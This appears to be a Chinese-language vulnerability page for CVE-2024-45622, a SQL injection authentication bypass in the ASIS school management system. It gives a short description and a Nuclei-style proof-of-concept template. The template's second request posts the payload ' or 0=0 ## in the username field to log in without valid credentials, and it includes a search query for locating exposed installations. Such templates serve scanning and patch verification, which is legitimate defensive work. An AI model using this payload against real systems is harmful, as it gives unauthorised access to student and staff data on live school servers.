漏洞描述
ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
CVE-2024-45622: ASIS - SQL Injection Authentication Bypass
PoC代码[已公开]
id: CVE-2024-45622
info:
name: ASIS - SQL Injection Authentication Bypass
author: s4e-io
severity: critical
description: |
ASIS (aka Aplikasi Sistem Sekolah using CodeIgniter 3) 3.0.0 through 3.2.0 allows index.php username SQL injection for Authentication Bypass.
reference:
- https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md
- https://packetstormsecurity.com/files/181355/ASIS-3.2.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2024-45622
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-45622
cwe-id: CWE-89
epss-score: 0.58594
epss-percentile: 0.98152
cpe: cpe:2.3:a:asis:asis:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: asis
product: asis
google-query: "ASIS | Aplikasi Sistem Sekolah"
tags: cve,cve2024,asis,auth-bypass,sqli
variables:
pass: "{{rand_base(10)}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
GET /asispanel/ HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"<title>ASIS | Aplikasi Sistem Sekolah </title>")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
POST /asispanel/login/cek HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=%27+or+0%3D0+%23%23&password={{pass}}&submit=&submit=
matchers:
- type: dsl
dsl:
- 'status_code == 303'
condition: and
internal: true
- raw:
- |
GET /asispanel/home HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "Logout")'
- 'status_code == 200'
condition: and
# digest: 490a00463044022036d00f316533be4cfc710d92d57e51eaa8b388be69b6dea4c780e1039dae77c402203cfb96bb2d9825bcef1870b0847200f5be8d9e25106f62f28fa626f91ba2dd1d:922c64590222798bb761d5b6d8e72950